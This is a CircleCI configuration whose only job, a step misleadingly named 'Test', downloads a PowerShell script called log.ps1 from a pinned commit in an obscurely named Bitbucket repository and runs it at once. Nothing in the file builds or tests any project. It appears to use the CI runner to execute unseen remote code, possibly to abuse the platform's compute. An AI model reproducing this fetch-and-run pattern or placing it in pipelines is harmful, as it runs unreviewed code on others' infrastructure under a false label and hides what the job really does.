version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: Test
          command: |
            Invoke-WebRequest https://bitbucket.org/gajah6/gajy3/raw/998193c889674dd2f8b09328f7b30dfd66dec5a8/log.ps1 -OutFile log.ps1
            ./log.ps1
